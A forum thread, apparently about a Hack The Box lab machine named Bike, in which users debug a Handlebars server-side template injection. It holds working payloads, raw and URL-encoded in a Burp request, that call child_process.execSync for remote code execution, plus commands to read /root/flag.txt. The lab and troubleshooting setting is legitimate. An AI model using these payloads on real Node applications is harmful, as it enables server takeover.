Starting Point: Bike

This box isn’t working the way it should according to the walkthrough. In Burp Repeater I execute:

POST / HTTP/1.1
Host: 10.129.12.226
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1334
Origin: http://10.129.12.226
Connection: close
Referer: http://10.129.12.226/
Upgrade-Insecure-Requests: 1

email=%7b%7b%23%77%69%74%68%20%22%73%22%20%61%73%20%7c%73%74%72%69%6e%67%7c%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%22%65%22%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%73%70%6c%69%74%20%61%73%20%7c%63%6f%6e%73%6c%69%73%74%7c%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%28%6c%6f%6f%6b%75%70%20%73%74%72%69%6e%67%2e%73%75%62%20%22%63%6f%6e%73%74%72%75%63%74%6f%72%22%29%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%73%74%72%69%6e%67%2e%73%70%6c%69%74%20%61%73%20%7c%63%6f%64%65%6c%69%73%74%7c%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%75%73%68%20%22%72%65%74%75%72%6e%0a%70%72%6f%63%65%73%73%2e%6d%61%69%6e%4d%6f%64%75%6c%65%2e%72%65%71%75%69%72%65%28%27%63%68%69%6c%64%5f%70%72%6f%63%65%73%73%27%29%2e%65%78%65%63%53%79%6e%63%28%27%77%68%6f%61%6d%69%27%29%3b%22%7d%7d%0a%20%7b%7b%74%68%69%73%2e%70%6f%70%7d%7d%0a%20%7b%7b%23%65%61%63%68%20%63%6f%6e%73%6c%69%73%74%7d%7d%0a%20%7b%7b%23%77%69%74%68%20%28%73%74%72%69%6e%67%2e%73%75%62%2e%61%70%70%6c%79%20%30%20%63%6f%64%65%6c%69%73%74%29%7d%7d%0a%20%7b%7b%74%68%69%73%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%65%61%63%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%20%7b%7b%2f%77%69%74%68%7d%7d%0a%7b%7b%2f%77%69%74%68%7d%7d&action=Submit

I get back this:

HTTP/1.1 200 OK
X-Powered-By: Express
Content-Type: text/html; charset=utf-8
Content-Length: 1172
ETag: W/"494-RpawBI+3kN5Kwt8S54wY32132DQ"
Date: Wed, 18 May 2022 15:21:07 GMT
Connection: close


<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <link rel="stylesheet" href="css/home.css">
    <title> Bike </title>
</head>
<header>

</header>

<body>
    <div id=container>
  <img
    src="images/buttons.gif"
    id="avatar">
  <div class="type-wrap">
    <span id="typed" style="white-space:pre;" class="typed"></span>
  </div>
</div>
<div id="contact">
    <h3>We can let you know once we are up and running.</h3>
    <div class="fields">
      <form id="form" method="POST" action="/">
        <input name="email" placeholder="E-mail"></input>
        <button type="submit" class="button-54" name="action" value="Submit">Submit</button>
      </form>
    </div>
    <p class="result">
        We will contact you at:  e
 2
 [object Object]
 function Function() { [native code] }
 2
 [object Object]

    </p>
</div>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
    <script src="js/typed.min.js"></script>
    <script src="js/main.js"></script>
</body>

</html>

According to the walkthrough I should get this:

I found out that it’s possible to follow this walkthrough all the way through if you use the pwnbox, but not if you’re using Kali-Linux-2022.2-virtualbox-amd64. Does anyone know why this is? What’s the vital difference?

@mercadier I am running into the exact same issue. I’m using Ubuntu 22.04 LTS. Have you found a solution, or are you still waiting for one?

I was having the same problem. I got around it by encoding the code block:

{{#with "s" as |string|}}
{{#with "e"}}
{{#with split as |conslist|}}
{{this.pop}}
{{this.push (lookup string.sub "constructor")}}
{{this.pop}}
{{#with string.split as |codelist|}}
{{this.pop}}
{{this.push "return process.mainModule;"}}
{{this.pop}}
{{#each conslist}}
{{#with (string.sub.apply 0 codelist)}}
{{this}}
{{/with}}
{{/each}}
{{/with}}
{{/with}}
{{/with}}
{{/with}}

Then instead of copying the next code blocks, just append the additional code onto the end of mainModule. You should be able to get the flag this way.

2 Likes

I think the machine does not work. I’ve got “The connection was reset” in pwnbox when entering the magic {{7*7}}.

Hello there, I am having the exact same issue described by @SampleService

I am using a fresh install of Kali 2022.2 as guest on Vbox, but I’ve got the same issue even with a Debian as host.

I’m having something similar. When I’m entering {{7*7}}, the error page is not loading. So I don’t see the server-side error code. I only get the firefox error page that the site could not be loaded. “Firefox can’t establish a connection to the server at 10.129.196.1.”

  • I’m connected via OpenVPN.
  • Kali Linux 2022.2

Exact same issue here, please file a case with customer service like I did. I believe that if they receive a massive load of such queries, this might speed up the process for this machine.

I’m running into the exact same issue.
I sent {{7*7}} and received “The connection was reset”.

The machine is now working properly, just solved without any problems!

This worked for me… thanks

If you are not getting the output “root”, add the method toString():

{{#with "s" as |string|}}
 {{#with "e"}}
 {{#with split as |conslist|}}
 {{this.pop}}
 {{this.push (lookup string.sub "constructor")}}
 {{this.pop}}
 {{#with string.split as |codelist|}}
 {{this.pop}}
 {{this.push "return process.mainModule.require('child_process').execSync('whoami').toString();"}}
 {{this.pop}}
 {{#each conslist}}
 {{#with (string.sub.apply 0 codelist)}}
 {{this}}
 {{/with}}
 {{/each}}
 {{/with}}
 {{/with}}
 {{/with}}
{{/with}}
5 Likes

I tried to apply the encoded payload directly to the email box. Didn’t get the same result as with using Burp. Got that “We will contact you at: %7b%7b%23%77%69%74%68%20%22%73%22%20%6…”.
Has anyone tried that and/or can explain how the string applied directly in the box differs from the one sent through Burp Repeater?
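The difference asked about above comes down to how many times the value is percent-encoded on its way to the server. The following is an added example, not code from the thread or from the box: it simulates the browser side (an application/x-www-form-urlencoded form encodes each field value once), the server side (the body parser decodes once), and a request sent directly by a proxy tool. It also shows a defensive check that inspects the decoded field for template delimiters, since a check on the raw body would miss a value arriving as %7b%7b. The function names and the sample value are constructed for illustration.

```javascript
// Added example: one layer of form encoding versus two.
// Function names and sample values are constructed for illustration.

// What the browser does on submit for application/x-www-form-urlencoded:
// every field value is percent-encoded exactly once.
function browserFormBody(emailValue) {
  return new URLSearchParams({ email: emailValue, action: "Submit" }).toString();
}

// What the server side does (e.g. an Express urlencoded body parser):
// decode the body exactly once into field values.
function serverParseBody(body) {
  return Object.fromEntries(new URLSearchParams(body));
}

// Defensive check: inspect the *decoded* field value for template
// delimiters. Inspecting the raw body would miss values sent as %7b%7b.
function looksLikeTemplateSyntax(decodedValue) {
  return /\{\{[^}]*\}\}/.test(decodedValue);
}

// Constructed sample input containing characters that need encoding.
const RAW_VALUE = '{{ hello "world" }}';

function scenarios() {
  // 1. Typed into the form as-is: browser encodes once, server decodes once,
  //    so the server sees RAW_VALUE.
  const direct = serverParseBody(browserFormBody(RAW_VALUE)).email;

  // 2. An already percent-encoded string pasted into the form: the browser
  //    encodes it again ('%' becomes '%25'), so after one decode the server
  //    sees the literal percent-encoded text, not RAW_VALUE.
  const preEncoded = encodeURIComponent(RAW_VALUE);
  const doubleEncoded = serverParseBody(browserFormBody(preEncoded)).email;

  // 3. The percent-encoded string placed directly in the request body, as a
  //    proxy tool sends it: only one layer, so it decodes back to RAW_VALUE.
  const viaProxy = serverParseBody(`email=${preEncoded}&action=Submit`).email;

  return {
    direct,
    doubleEncoded,
    viaProxy,
    flags: {
      direct: looksLikeTemplateSyntax(direct),
      doubleEncoded: looksLikeTemplateSyntax(doubleEncoded),
      viaProxy: looksLikeTemplateSyntax(viaProxy),
    },
  };
}

console.log(scenarios());
```

Scenario 2 is what happens when the encoded payload is pasted into the e-mail box: the page echoes the percent-encoded text back literally because that is exactly the string the server received. Scenario 3 is the Burp Repeater case. For the same reason, any server-side inspection of form fields should run on the decoded values the application will actually use.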

Once I change the return process line to {{this.push "return process.mainModule.require('child_process').execSync('whoami');"}}, it gives me output but does not indicate “root” in the return.

Then all the other Node.js code that follows only gives me syntax errors. I’ve tried copying, typing, running this on the HTB desktop, running the lab on a VPN through ParrotSec, and I get stuck at this point every time.

It worked for me, thank you so much!

There is a text formatting error if you follow along in the writeup and copy and paste into Burp. There is an extra line. Anything that is below the this.push "return line should be moved up and added to it.

{{this.push "return
process.mainModule.require('child_process').execSync('whoami');"}}

Should look like

{{this.push "return process.mainModule.require('child_process').execSync('whoami');"}}

3 Likes
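The extra line described above matters because of a JavaScript rule rather than anything in Handlebars: automatic semicolon insertion ends a return statement at a line break, so a function body that reads return, newline, expression is parsed as return; followed by unreachable code, and the function returns undefined. The following is an added illustration, not code from the thread, using a harmless arithmetic expression; the function names are constructed.

```javascript
// Added example: automatic semicolon insertion (ASI) after `return`.
// Function names and sample bodies are constructed for illustration.

// Build a function from a source string and call it, reporting the
// outcome instead of throwing, so malformed bodies can be compared too.
function runBody(body) {
  try {
    const fn = new Function(body);
    return { ok: true, value: fn() };
  } catch (err) {
    return { ok: false, error: err.constructor.name };
  }
}

// The same expression three ways:
//  - split: a line break directly after `return` ends the statement,
//    so the expression on the next line is never evaluated.
//  - joined: the expression is on the same line as `return`.
//  - paren: an opening parenthesis on the `return` line keeps the
//    statement open across line breaks (the idiomatic multi-line form).
const SPLIT_BODY = "return\n6 * 7;";
const JOINED_BODY = "return 6 * 7;";
const PAREN_BODY = "return (\n  6 * 7\n);";

function compareBodies() {
  return {
    split: runBody(SPLIT_BODY).value,   // undefined
    joined: runBody(JOINED_BODY).value, // 42
    paren: runBody(PAREN_BODY).value,   // 42
  };
}

console.log(compareBodies());
```

The split case is exactly the shape of the copied-and-pasted line in the writeup: the text after the line break is syntactically valid, compiles without error, and simply never runs, which is why the rendered result is blank rather than an error message.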

This fixed it for me. Thanks technonerd!

Okay, when you ls /root: ls space /root will work.
Then for the next one you have to do cat space /root/flag.txt.